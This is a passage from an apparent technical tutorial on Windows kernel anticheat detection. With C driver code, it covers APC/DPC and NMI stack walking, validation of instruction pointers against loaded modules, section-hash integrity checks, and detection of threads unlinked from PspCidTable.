<p>Stack walking via Asynchronous Procedure Calls (APC) and Deferred Procedure Calls (DPC) is an essential technique for identifying potentially malicious activities. Both are mechanisms for executing code asynchronously, but they operate differently and serve different purposes within the Windows operating system: an APC is delivered to a particular thread and runs in that thread's context, while a DPC runs at DISPATCH_LEVEL on a processor, in whatever thread context happens to be current.</p>
<p>APC stack walking via <code>RtlCaptureStackBackTrace</code> is used to capture the call stack of a thread at a specific point in time when an APC is executed. APCs are designed to allow user-mode applications and kernel-mode drivers to execute code in the context of a specific thread. They are commonly used for asynchronous I/O operations and other delayed execution tasks.</p>
<p>To implement APC stack walking, the driver can set an APC to be executed in the context of a thread and then use <code>RtlCaptureStackBackTrace</code> to capture the call stack. This allows the driver to examine the sequence of function calls that led to the execution of the APC and identify any suspicious or unauthorized code execution paths.</p>
<pre><code class="lang-cpp"><span class="hljs-function">VOID <span class="hljs-title">APCFunction</span><span class="hljs-params">(KAPC *Apc, PKNORMAL_ROUTINE *NormalRoutine, PVOID *NormalContext,
                 PVOID *SystemArgument1, PVOID *SystemArgument2)</span>
</span>{
    UNREFERENCED_PARAMETER(NormalRoutine);
    UNREFERENCED_PARAMETER(NormalContext);
    UNREFERENCED_PARAMETER(SystemArgument1);
    UNREFERENCED_PARAMETER(SystemArgument2);

    ULONG framesToCapture = <span class="hljs-number">10</span>;
    PVOID stackBackTrace[<span class="hljs-number">10</span>];
    ULONG capturedFrames = RtlCaptureStackBackTrace(<span class="hljs-number">0</span>, framesToCapture, stackBackTrace, <span class="hljs-literal">NULL</span>);

    <span class="hljs-keyword">for</span> (ULONG i = <span class="hljs-number">0</span>; i &lt; capturedFrames; i++)
    {
        DbgPrint(<span class="hljs-string">"APC Stack Frame[%lu]: %p\n"</span>, i, stackBackTrace[i]);
    }

    <span class="hljs-comment">// The APC has been delivered, so release the KAPC allocated by the caller</span>
    ExFreePool(Apc);
}

<span class="hljs-function">VOID <span class="hljs-title">SetAPC</span><span class="hljs-params">(PETHREAD Thread)</span>
</span>{
    PKAPC apc = (PKAPC)ExAllocatePool(NonPagedPool, <span class="hljs-keyword">sizeof</span>(KAPC));
    <span class="hljs-keyword">if</span> (apc)
    {
        KeInitializeApc(apc, Thread, OriginalApcEnvironment, APCFunction, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, KernelMode, <span class="hljs-literal">NULL</span>);
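        <span class="hljs-keyword">if</span> (!KeInsertQueueApc(apc, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>))
            ExFreePool(apc); <span class="hljs-comment">// insertion failed, so nothing else owns the allocation</span>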
    }
}
</code></pre>
<p>In this example, <code>APCFunction</code> is the APC routine that captures the stack trace using <code>RtlCaptureStackBackTrace</code> and prints the captured stack frames. The <code>SetAPC</code> function initializes and inserts the APC into the queue of the specified thread.</p>
<p>DPC stack walking via <code>RtlCaptureStackBackTrace</code> operates similarly but is used for Deferred Procedure Calls. DPCs are designed to handle high-priority tasks that need to be executed promptly but at a lower priority than interrupt service routines (ISRs). They are commonly used for deferred processing of I/O operations and other time-sensitive tasks that do not require immediate execution in the context of an interrupt.</p>
<p>To capture the stack trace during a DPC execution, the driver can set up a DPC and use <code>RtlCaptureStackBackTrace</code> in the DPC routine to examine the call stack. This allows the driver to analyze the sequence of function calls that led to the DPC execution and detect any anomalies.</p>
<pre><code class="lang-cpp"><span class="hljs-function">VOID <span class="hljs-title">DPCFunction</span><span class="hljs-params">(KDPC *Dpc, PVOID DeferredContext, PVOID SystemArgument1, PVOID SystemArgument2)</span>
</span>{
    UNREFERENCED_PARAMETER(DeferredContext);
    UNREFERENCED_PARAMETER(SystemArgument1);
    UNREFERENCED_PARAMETER(SystemArgument2);

    ULONG framesToCapture = <span class="hljs-number">10</span>;
    PVOID stackBackTrace[<span class="hljs-number">10</span>];
    ULONG capturedFrames = RtlCaptureStackBackTrace(<span class="hljs-number">0</span>, framesToCapture, stackBackTrace, <span class="hljs-literal">NULL</span>);

    <span class="hljs-keyword">for</span> (ULONG i = <span class="hljs-number">0</span>; i &lt; capturedFrames; i++)
    {
        DbgPrint(<span class="hljs-string">"DPC Stack Frame[%lu]: %p\n"</span>, i, stackBackTrace[i]);
    }

    <span class="hljs-comment">// The DPC has been dequeued and is running, so release the KDPC allocated by the caller</span>
    ExFreePool(Dpc);
}

<span class="hljs-function">VOID <span class="hljs-title">ScheduleDPC</span><span class="hljs-params">()</span>
</span>{
    PKDPC dpc = (PKDPC)ExAllocatePool(NonPagedPool, <span class="hljs-keyword">sizeof</span>(KDPC));
    <span class="hljs-keyword">if</span> (dpc)
    {
        KeInitializeDpc(dpc, DPCFunction, <span class="hljs-literal">NULL</span>);
        KeInsertQueueDpc(dpc, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>);
    }
}
</code></pre>
<p>In this example, <code>DPCFunction</code> is the DPC routine that captures the stack trace using <code>RtlCaptureStackBackTrace</code> and prints the captured stack frames. The <code>ScheduleDPC</code> function initializes and inserts the DPC into the system DPC queue.</p>
<p>Comparing the two approaches, APC stack walking is performed in the context of a specific thread, which allows for a more granular inspection of thread-specific execution paths. This is particularly useful for detecting malicious code execution within user-mode threads or within specific kernel-mode threads. DPC stack walking, on the other hand, is not tied to a chosen thread: the DPC runs on a processor at a higher priority than normal thread execution, in whatever context was current at the time. This makes it better suited to sampling high-priority, time-sensitive activity, such as work related to interrupt handling or critical I/O processing. Both approaches rely on <code>RtlCaptureStackBackTrace</code> to capture the call stack, and in both cases the captured addresses only become useful once they are checked against known code regions.</p>
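<p>Neither example above does anything with the frames beyond printing them. As a sketch of the next step, the code below takes an array of captured return addresses and reports the first one that is not backed by any loaded module. <code>ModuleRange</code>, both functions and every address in the self-check are hypothetical; a driver would build the module list from the system's loaded-module information instead.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* Hypothetical module record: load address and size in bytes. */
typedef struct {
    uint64_t base;
    uint64_t size;
} ModuleRange;

/* 1 when addr falls inside any of the count module ranges. */
static int backed_by_module(uint64_t addr, const ModuleRange *mods, size_t count) {
    for (size_t m = 0; m &lt; count; m++) {
        if (addr &gt;= mods[m].base &amp;&amp; addr - mods[m].base &lt; mods[m].size)
            return 1;
    }
    return 0;
}

/* Index of the first frame outside every module, or -1 when all are backed. */
int first_unbacked_frame(const uint64_t *frames, size_t nframes,
                         const ModuleRange *mods, size_t count) {
    for (size_t i = 0; i &lt; nframes; i++) {
        if (!backed_by_module(frames[i], mods, count))
            return (int)i;
    }
    return -1;
}

/* Self-check with made-up addresses. */
int frame_scan_demo(void) {
    const ModuleRange mods[] = {
        { 0xfffff80000000000ull, 0x100000 },  /* pretend kernel image */
        { 0xfffff80001000000ull, 0x20000 },   /* pretend driver */
    };
    const uint64_t clean[] = { 0xfffff80000001234ull, 0xfffff80001000010ull };
    const uint64_t dirty[] = { 0xfffff80000001234ull, 0xffffa00012345678ull };

    return first_unbacked_frame(clean, 2, mods, 2) == -1 &amp;&amp;
           first_unbacked_frame(dirty, 2, mods, 2) == 1;
}
</code></pre>
<p>A return address that points into memory no module claims is the classic signature of manually mapped or injected code on the call path.</p>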
<h2 id="heading-nmi-stackwalking">NMI Stackwalking</h2>
<p>NMI (Non-Maskable Interrupt) stackwalking via ISR (Interrupt Service Routine) IRETQ involves a sequence of operations to validate the integrity of the system by inspecting the call stack during an NMI. This is achieved by handling NMIs and capturing the call stack through the interrupt service routine, ensuring no unauthorized modifications have been made to critical sections of the kernel.</p>
<p>The check starts in the <code>HandleNmiIOCTL</code> function. As the <code>PAGED_CODE()</code> marker in the snippet below indicates, it runs at low IRQL rather than inside the interrupt itself, and it is responsible for setting up the necessary environment to capture the stack trace. The ISR for the NMI is designed to save the processor state, including the instruction pointer, stack pointer, and other critical registers, to ensure a reliable context for stackwalking.</p>
<p>A companion routine, shown further down, dispatches a DPC (Deferred Procedure Call) to each CPU. This DPC is used to walk the stack and capture the instruction pointers at each frame. The captured stack frames are then validated against known good regions of the code to detect any anomalies.</p>
<pre><code class="lang-c">HandleNmiIOCTL()
{
    PAGED_CODE();

    NTSTATUS       status  = STATUS_UNSUCCESSFUL;
    PVOID          handle  = <span class="hljs-literal">NULL</span>;
    SYSTEM_MODULES modules = {<span class="hljs-number">0</span>};
    PNMI_CONTEXT   context = <span class="hljs-literal">NULL</span>;

    UINT32 size = ImpKeQueryActiveProcessorCount(<span class="hljs-number">0</span>) * <span class="hljs-keyword">sizeof</span>(NMI_CONTEXT);

    <span class="hljs-keyword">if</span> (IsNmiInProgress())
        <span class="hljs-keyword">return</span> STATUS_ALREADY_COMMITTED;

    status = ValidateHalDispatchTables();
</code></pre>
<p>The <code>HandleNmiIOCTL</code> function prepares the system to handle an NMI, ensuring that all necessary resources are allocated and the environment is correctly configured. The DPC-based stackwalk is performed by dispatching a DPC to each CPU. The DPC callback function captures the stack frames, which are then validated.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">DispatchStackwalkToEachCpuViaDpc</span><span class="hljs-params">()</span>
</span>{
    NTSTATUS       status  = STATUS_UNSUCCESSFUL;
    PDPC_CONTEXT   context = <span class="hljs-literal">NULL</span>;
    SYSTEM_MODULES modules = {<span class="hljs-number">0</span>};
    UINT32 size = ImpKeQueryActiveProcessorCount(<span class="hljs-number">0</span>) * <span class="hljs-keyword">sizeof</span>(DPC_CONTEXT);
    context = ImpExAllocatePool2(POOL_FLAG_NON_PAGED, size, POOL_TAG_DPC);
    <span class="hljs-keyword">if</span> (!context)
        <span class="hljs-keyword">return</span> STATUS_MEMORY_NOT_ALLOCATED;
    status = GetSystemModuleInformation(&amp;modules);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"GetSystemModuleInformation failed with status %x"</span>, status);
        <span class="hljs-keyword">goto</span> end;
    }
    ImpKeGenericCallDpc(DpcStackwalkCallbackRoutine, context);
    <span class="hljs-keyword">while</span> (!CheckForDpcCompletion(context))
        YieldProcessor();
    ValidateDpcCapturedStack(&amp;modules, context);
    DEBUG_VERBOSE(<span class="hljs-string">"Finished validating cores via dpc"</span>);
end:
    <span class="hljs-keyword">if</span> (modules.address)
        ImpExFreePoolWithTag(modules.address, SYSTEM_MODULES_POOL);
    <span class="hljs-keyword">if</span> (context)
        ImpExFreePoolWithTag(context, POOL_TAG_DPC);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>In the context of an NMI, the ISR captures the processor state and obtains the stack trace. This is typically done within the ISR or the NMI callback. We can retrieve the interrupted instruction pointer (RIP) and stack pointer (RSP), ensuring that even at high interrupt levels, critical information can be captured without relying on potentially unsafe functions. We can then access the specific NMI context for the current processor core from the <code>Context</code> array. Several variables are initialized, including <code>kpcr</code> for the kernel processor control region, <code>tss</code> for the task state segment, and <code>machine_frame</code> for the interrupted machine state.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC BOOLEAN
<span class="hljs-title">NmiCallback</span><span class="hljs-params">(_Inout_opt_ PVOID Context, _In_ BOOLEAN Handled)</span>
</span>{
    UNREFERENCED_PARAMETER(Handled);

    ULONG                  core          = KeGetCurrentProcessorNumber();
    PNMI_CONTEXT           context       = &amp;((PNMI_CONTEXT)Context)[core];
    UINT64                 kpcr          = <span class="hljs-number">0</span>;
    TASK_STATE_SEGMENT_64* tss           = <span class="hljs-literal">NULL</span>;
    PMACHINE_FRAME         machine_frame = <span class="hljs-literal">NULL</span>;

    <span class="hljs-keyword">if</span> (!ARGUMENT_PRESENT(Context))
        <span class="hljs-keyword">return</span> TRUE;
    kpcr          = __readmsr(IA32_GS_BASE);
    tss           = GetTaskStateSegment(kpcr);
    machine_frame = GetIsrMachineFrame(tss);
</code></pre>
<p>To locate the IRETQ frame, which contains the interrupted instruction pointer (RIP), the function must find the top of the NMI ISR stack. This stack top is stored in the TSS (Task State Segment) at <code>TSS-&gt;Ist[3]</code>. The TSS itself can be obtained from the <code>KPCR-&gt;TSS_BASE</code>. After obtaining the TSS, the function reads the value at <code>TSS-&gt;Ist[3]</code>, which points to the top of the ISR stack, and then subtracts the size of the <code>MACHINE_FRAME</code> structure. This allows the function to read the interrupted RIP.</p>
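<p>The pointer arithmetic in that paragraph can be modelled in user space. In 64-bit mode the CPU pushes SS, RSP, RFLAGS, CS and RIP when it delivers an interrupt that carries no error code, so the frame occupies the five 8-byte slots directly below the stack top. The sketch below builds a fake ISR stack and recovers the interrupted RIP and RSP from the top-of-stack value alone. <code>MachineFrame</code>, <code>frame_below_top</code> and all values are hypothetical, and the driver's own <code>MACHINE_FRAME</code> may name its fields differently.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* Hypothetical layout of the frame pushed on a 64-bit interrupt
   without an error code, lowest address first. */
typedef struct {
    uint64_t rip;
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
} MachineFrame;

/* The frame occupies the last sizeof(MachineFrame) bytes below the stack top. */
const MachineFrame *frame_below_top(const void *stack_top) {
    return (const MachineFrame *)((const uint8_t *)stack_top - sizeof(MachineFrame));
}

/* Self-check: lay the five values out the way the CPU would,
   then read them back starting from the stack top. */
int machine_frame_demo(void) {
    uint64_t stack[64] = { 0 };
    uint64_t *top = stack + 64;          /* one past the highest slot */
    const uint64_t pushed[5] = {
        0xfffff80012345678ull,           /* RIP */
        0x10,                            /* CS */
        0x246,                           /* RFLAGS */
        0xfffffa8000001000ull,           /* RSP */
        0x18,                            /* SS */
    };
    memcpy(top - 5, pushed, sizeof pushed);

    const MachineFrame *mf = frame_below_top(top);
    return mf-&gt;rip == 0xfffff80012345678ull &amp;&amp;
           mf-&gt;rsp == 0xfffffa8000001000ull;
}
</code></pre>
<p>Because the hardware writes this frame, the callback can read RIP and RSP from it without calling into any routine that might itself be hooked.</p>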
<p>Using the <code>__readmsr</code> function, the <code>kpcr</code> is retrieved, which is the base address of the KPCR. The <code>GetTaskStateSegment</code> function is then called to obtain the TSS from the <code>kpcr</code>. Finally, the <code>GetIsrMachineFrame</code> function retrieves the machine frame from the TSS. We can then check if the interrupted RIP belongs to user mode using <code>IsUserModeAddress</code>. If it does, it sets the <code>user_thread</code> flag in the context to <code>TRUE</code>.</p>
<pre><code class="lang-c">    <span class="hljs-keyword">if</span> (IsUserModeAddress(machine_frame-&gt;rip))
        context-&gt;user_thread = TRUE;

    context-&gt;interrupted_rip = machine_frame-&gt;rip;
    context-&gt;interrupted_rsp = machine_frame-&gt;rsp;
    context-&gt;kthread         = PsGetCurrentThread();
    context-&gt;callback_count++;

    DEBUG_VERBOSE(
        <span class="hljs-string">"[NMI CALLBACK]: Core Number: %lx, Interrupted RIP: %llx, Interrupted RSP: %llx"</span>,
        core,
        machine_frame-&gt;rip,
        machine_frame-&gt;rsp);

    <span class="hljs-keyword">return</span> TRUE;
}
</code></pre>
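<p>The user-mode test at the top of this snippet can be approximated by comparing the address against the top of user space. The limit below assumes the 48-bit canonical layout, in which user addresses end at <code>0x00007FFFFFFFFFFF</code>; <code>is_user_mode_address</code> is a hypothetical stand-in and may not match how <code>IsUserModeAddress</code> is actually written.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* Highest user-mode address under the assumed 48-bit canonical layout. */
#define USER_SPACE_LIMIT 0x00007fffffffffffull

/* 1 when addr is in the lower (user) half of the address space. */
int is_user_mode_address(uint64_t addr) {
    return addr &lt;= USER_SPACE_LIMIT;
}
</code></pre>
<p>An interrupted RIP such as <code>0x00007ff612340000</code> would be tagged as a user thread, while <code>0xfffff80012345678</code> would go on to the module-range validation.</p>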
<p>The interrupted RIP and RSP are stored in the context. The current thread is obtained using <code>PsGetCurrentThread</code> and stored in the context's <code>kthread</code> field. The <code>callback_count</code> is incremented to keep track of the number of times this callback has been invoked. To determine the validity of an instruction pointer, we can check whether the captured instruction pointer (RIP) falls within an invalid region, indicating potential tampering.</p>
<pre><code class="lang-c"><span class="hljs-function">BOOLEAN
<span class="hljs-title">IsInstructionPointerInInvalidRegion</span><span class="hljs-params">(_In_ UINT64          RIP,
                                    _In_ PSYSTEM_MODULES SystemModules)</span>
</span>{
    PAGED_CODE();

    PRTL_MODULE_EXTENDED_INFO modules =
        (PRTL_MODULE_EXTENDED_INFO)SystemModules-&gt;address;

    <span class="hljs-keyword">for</span> (INT index = <span class="hljs-number">0</span>; index &lt; SystemModules-&gt;module_count; index++) {
        UINT64 base = (UINT64)modules[index].ImageBase;
        UINT64 end  = base + modules[index].ImageSize;

        <span class="hljs-keyword">if</span> (RIP &gt;= base &amp;&amp; RIP &lt; end) {
            <span class="hljs-keyword">return</span> FALSE;
        }
    }

    <span class="hljs-keyword">return</span> TRUE;
}
</code></pre>
<h2 id="heading-memory-section-integrity-checks">Memory Section Integrity Checks</h2>
<p>Cheaters often attempt to modify game code or system modules. We can detect these attempts by verifying that the executable code in memory matches the original, untampered code.</p>
<p>Once we have obtained the module information, we can copy the module's executable sections into a buffer for further analysis. We do this by iterating through the module's sections, identifying the executable ones, and copying each of them into the buffer.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS <span class="hljs-title">StoreModuleExecutableRegionsInBuffer</span><span class="hljs-params">(_Out_ PVOID* Buffer,
                                              _In_ PVOID ModuleBase,
                                              _In_ SIZE_T ModuleSize,
                                              _Out_ PSIZE_T BytesWritten,
                                              _In_ BOOLEAN IsModulex86)</span> </span>{
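    <span class="hljs-comment">// Local declarations (status, nt_header, section, address, ...) are omitted for brevity.</span>
    <span class="hljs-keyword">if</span> (!ModuleBase || !ModuleSize)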
        <span class="hljs-keyword">return</span> STATUS_INVALID_PARAMETER;
    <span class="hljs-keyword">if</span> (!IsModuleAddressSafe(ModuleBase, IsModulex86))
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;

    *BytesWritten = <span class="hljs-number">0</span>;
    *Buffer = ImpExAllocatePool2(POOL_FLAG_NON_PAGED,
                                 ModuleSize + <span class="hljs-keyword">sizeof</span>(INTEGRITY_CHECK_HEADER),
                                 POOL_TAG_INTEGRITY);
    <span class="hljs-keyword">if</span> (*Buffer == <span class="hljs-literal">NULL</span>)
        <span class="hljs-keyword">return</span> STATUS_MEMORY_NOT_ALLOCATED;

    nt_header = PeGetNtHeader(ModuleBase);
    num_sections = GetSectionCount(nt_header);
    section = IMAGE_FIRST_SECTION(nt_header);
    buffer_base = (UINT64)*Buffer + <span class="hljs-keyword">sizeof</span>(INTEGRITY_CHECK_HEADER);

    <span class="hljs-keyword">for</span> (ULONG index = <span class="hljs-number">0</span>; index &lt; num_sections - <span class="hljs-number">1</span>; index++) {
        <span class="hljs-keyword">if</span> (!IsSectionExecutable(section)) {
            section++;
            <span class="hljs-keyword">continue</span>;
        }
        address.VirtualAddress = section;
        status = ImpMmCopyMemory((UINT64)buffer_base + total_packet_size,
                                 address,
                                 <span class="hljs-keyword">sizeof</span>(IMAGE_SECTION_HEADER),
                                 MM_COPY_MEMORY_VIRTUAL,
                                 &amp;bytes_returned);
        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
            ImpExFreePoolWithTag(*Buffer, POOL_TAG_INTEGRITY);
            *Buffer = <span class="hljs-literal">NULL</span>;
            <span class="hljs-keyword">return</span> status;
        }
        address.VirtualAddress = (UINT64)ModuleBase + section-&gt;PointerToRawData;
        status = ImpMmCopyMemory((UINT64)buffer_base + total_packet_size +
                                     <span class="hljs-keyword">sizeof</span>(IMAGE_SECTION_HEADER),
                                 address,
                                 section-&gt;SizeOfRawData,
                                 MM_COPY_MEMORY_VIRTUAL,
                                 &amp;bytes_returned);
        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
            ImpExFreePoolWithTag(*Buffer, POOL_TAG_INTEGRITY);
            *Buffer = <span class="hljs-literal">NULL</span>;
            <span class="hljs-keyword">return</span> status;
        }
        total_packet_size += GetSectionTotalPacketSize(section);
        num_executable_sections++;
        section++;
    }
    InitIntegrityCheckHeader(&amp;header, num_executable_sections, total_packet_size);
    RtlCopyMemory(*Buffer, &amp;header, <span class="hljs-keyword">sizeof</span>(INTEGRITY_CHECK_HEADER));
    *BytesWritten = total_packet_size + <span class="hljs-keyword">sizeof</span>(INTEGRITY_CHECK_HEADER);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>We first check whether a section is executable and, if it is, copy its section header and contents into the buffer. The buffer then contains all the executable sections of the module, which will be used for integrity verification. The next crucial step is to map the disk image of the module into the virtual address space. This allows the integrity checker to access the module's original, unmodified state directly from the disk.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS <span class="hljs-title">MapDiskImageIntoVirtualAddressSpace</span><span class="hljs-params">(_Inout_ PHANDLE SectionHandle,
                                             _Out_ PVOID* Section,
                                             _In_ PUNICODE_STRING Path,
                                             _Out_ PSIZE_T Size)</span> </span>{
    HANDLE file_handle = <span class="hljs-literal">NULL</span>;
    OBJECT_ATTRIBUTES object_attributes = {<span class="hljs-number">0</span>};
    UNICODE_STRING path = {<span class="hljs-number">0</span>};
    *Section = <span class="hljs-literal">NULL</span>;
    *Size = <span class="hljs-number">0</span>;
    ImpRtlInitUnicodeString(&amp;path, Path-&gt;Buffer);
    InitializeObjectAttributes(&amp;object_attributes, &amp;path, OBJ_KERNEL_HANDLE, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>);
    status = ImpZwOpenFile(&amp;file_handle, GENERIC_READ, &amp;object_attributes, &amp;pio_block, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        <span class="hljs-keyword">return</span> status;
    }
    object_attributes.ObjectName = <span class="hljs-literal">NULL</span>;
    status = ImpZwCreateSection(SectionHandle, SECTION_ALL_ACCESS, &amp;object_attributes, <span class="hljs-literal">NULL</span>, PAGE_READONLY, SEC_IMAGE, file_handle);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        ImpZwClose(file_handle);
        *SectionHandle = <span class="hljs-literal">NULL</span>;
        <span class="hljs-keyword">return</span> status;
    }
    status = ImpZwMapViewOfSection(*SectionHandle, ZwCurrentProcess(), Section, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, Size, ViewUnmap, MEM_TOP_DOWN, PAGE_READONLY);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        ImpZwClose(file_handle);
        ImpZwClose(*SectionHandle);
        *SectionHandle = <span class="hljs-literal">NULL</span>;
        <span class="hljs-keyword">return</span> status;
    }
    ImpZwClose(file_handle);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>After mapping the disk image, we can call the storing function again, this time with the disk image as the source. This gives us a second buffer containing the executable sections from the disk image, which can be directly compared to the in-memory buffer.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS <span class="hljs-title">ComputeHashOfSections</span><span class="hljs-params">(_In_ PIMAGE_SECTION_HEADER DiskSection,
                               _In_ PIMAGE_SECTION_HEADER MemorySection,
                               _Out_ PVOID* DiskHash,
                               _Out_ PULONG DiskHashSize,
                               _Out_ PVOID* MemoryHash,
                               _Out_ PULONG MemoryHashSize)</span> </span>{
    <span class="hljs-keyword">if</span> (DiskSection-&gt;SizeOfRawData != MemorySection-&gt;SizeOfRawData) {
        <span class="hljs-keyword">return</span> STATUS_INVALID_BUFFER_SIZE;
    }
    status = ComputeHashOfBuffer((UINT64)DiskSection + <span class="hljs-keyword">sizeof</span>(IMAGE_SECTION_HEADER),
                                 DiskSection-&gt;SizeOfRawData,
                                 DiskHash,
                                 DiskHashSize);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        <span class="hljs-keyword">return</span> status;
    }
    status = ComputeHashOfBuffer((UINT64)MemorySection + <span class="hljs-keyword">sizeof</span>(IMAGE_SECTION_HEADER),
                                 MemorySection-&gt;SizeOfRawData,
                                 MemoryHash,
                                 MemoryHashSize);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>We check if the sizes of the sections match before computing their hashes, then generate the SHA-256 hashes of the section contents. Finally, we can compare the two results. If the hashes do not match, it indicates that the in-memory section has been modified and we can trigger an integrity violation.</p>
<pre><code class="lang-c"><span class="hljs-function">FORCEINLINE
STATIC
BOOLEAN
<span class="hljs-title">CompareHashes</span><span class="hljs-params">(_In_ PVOID Hash1, _In_ PVOID Hash2, _In_ UINT32 Length)</span> </span>{
    <span class="hljs-keyword">return</span> RtlCompareMemory(Hash1, Hash2, Length) == Length ? TRUE : FALSE;
}
</code></pre>
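<p>To make the comparison concrete, here is a small user-mode model of walking two such buffers side by side. Everything in it is a stand-in: <code>packet_header_t</code> is a cut-down placeholder for <code>IMAGE_SECTION_HEADER</code>, the leading <code>INTEGRITY_CHECK_HEADER</code> is left out, and a plain <code>memcmp</code> takes the place of hashing both sides with SHA-256. It only assumes that each packet is a header followed by that section's raw bytes.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* Cut-down placeholder for IMAGE_SECTION_HEADER: just a name and a size. */
typedef struct {
    char     name[8];
    uint32_t size_of_raw_data;
} packet_header_t;

/* Walks two buffers of [header][raw bytes] packets in lockstep.
 * Returns the index of the first section that differs, or -1 if all
 * `count` sections match. */
static int first_modified_section(const uint8_t *disk, const uint8_t *memory,
                                  uint32_t count)
{
    for (uint32_t index = 0; index &lt; count; index++) {
        packet_header_t disk_hdr, mem_hdr;
        memcpy(&amp;disk_hdr, disk, sizeof disk_hdr);
        memcpy(&amp;mem_hdr, memory, sizeof mem_hdr);

        /* Mirrors the size check done before hashing. */
        if (disk_hdr.size_of_raw_data != mem_hdr.size_of_raw_data)
            return (int)index;

        /* memcmp stands in for comparing the two SHA-256 digests. */
        if (memcmp(disk + sizeof disk_hdr, memory + sizeof mem_hdr,
                   disk_hdr.size_of_raw_data) != 0)
            return (int)index;

        disk   += sizeof disk_hdr + disk_hdr.size_of_raw_data;
        memory += sizeof mem_hdr + mem_hdr.size_of_raw_data;
    }
    return -1;
}
</code></pre>
<p>Returning the section index, instead of a bare pass or fail, lets a report say which section was patched.</p>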
<h2 id="heading-detection-of-pspcidtable-entry-detection-removal">Detection of <code>PspCidTable</code> Entry Removal</h2>
<p>The <code>PspCidTable</code> (Process Structure CID Table) is a critical data structure in the Windows kernel that maintains mappings of process and thread IDs to their respective structures. By removing or modifying entries in this table, a cheat can effectively hide its own threads and processes from system monitoring tools. This makes it difficult for anticheat systems to detect the presence of the cheat software.</p>
<p>Previously, we captured the state of the interrupted thread and stored the relevant information in the <code>NMI_CONTEXT</code> structure. This includes the <code>kthread</code> pointer, which points to the current thread's kernel structure. We can in turn use this pointer to detect removed <code>PspCidTable</code> entries, which is crucial for identifying malicious activity that attempts to hide threads from the operating system.</p>
<p>After capturing the thread context via NMI, the <code>AnalyseNmiData</code> function is used to validate the presence of each thread in the <code>PspCidTable</code>. The function iterates through each core's <code>NMI_CONTEXT</code> and checks if the captured thread is listed in the <code>PspCidTable</code>.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">AnalyseNmiData</span><span class="hljs-params">(_In_ PNMI_CONTEXT NmiContext, _In_ PSYSTEM_MODULES SystemModules)</span>
</span>{
    PAGED_CODE();

    NTSTATUS status = STATUS_UNSUCCESSFUL;

    <span class="hljs-keyword">if</span> (!NmiContext || !SystemModules)
        <span class="hljs-keyword">return</span> STATUS_INVALID_PARAMETER;

    <span class="hljs-keyword">for</span> (INT core = <span class="hljs-number">0</span>; core &lt; ImpKeQueryActiveProcessorCount(<span class="hljs-number">0</span>); core++) {
        <span class="hljs-keyword">if</span> (!NmiContext[core].callback_count) {
            ReportNmiBlocking();
            <span class="hljs-keyword">return</span> STATUS_SUCCESS;
        }

        DEBUG_VERBOSE(
            <span class="hljs-string">"Analysing Nmi Data for: cpu number: %i callback count: %lx"</span>,
            core,
            NmiContext[core].callback_count);

        <span class="hljs-keyword">if</span> (!DoesThreadHaveValidCidEntry(NmiContext[core].kthread)) {
            ReportMissingCidTableEntry(&amp;NmiContext[core]);
        }

        <span class="hljs-keyword">if</span> (NmiContext[core].user_thread)
            <span class="hljs-keyword">continue</span>;

        <span class="hljs-keyword">if</span> (IsInstructionPointerInInvalidRegion(
                NmiContext[core].interrupted_rip, SystemModules))
            ReportInvalidRipFoundDuringNmi(&amp;NmiContext[core]);
    }

    <span class="hljs-keyword">return</span> STATUS_SUCCESS;
}
</code></pre>
<p>We can then verify if the thread has a valid entry in the <code>PspCidTable</code>. If the thread is not found in the <code>PspCidTable</code>, it indicates that the thread might have been hidden or unlinked, which is a common technique used by cheat programs to avoid detection.</p>
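<p><code>DoesThreadHaveValidCidEntry</code> is not shown here. One plausible shape for such a check is a round trip: take the thread's ID, look it up in the table, and confirm that the lookup returns the same object. The user-mode model below illustrates only that idea. <code>cid_table_t</code>, <code>cid_lookup</code> and <code>has_valid_cid_entry</code> are invented for the example, and in a driver the lookup would presumably go through a kernel routine such as <code>PsLookupThreadByThreadId</code> rather than a hand-rolled array.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* Toy stand-ins: a thread object and a table mapping IDs to objects. */
typedef struct {
    uint32_t id;
} thread_t;

typedef struct {
    thread_t **entries; /* entries[i] may be NULL for a removed slot */
    size_t     count;
} cid_table_t;

/* Returns the object registered under `id`, or NULL if none is. */
static thread_t *cid_lookup(const cid_table_t *table, uint32_t id)
{
    for (size_t i = 0; i &lt; table-&gt;count; i++) {
        if (table-&gt;entries[i] &amp;&amp; table-&gt;entries[i]-&gt;id == id)
            return table-&gt;entries[i];
    }
    return NULL;
}

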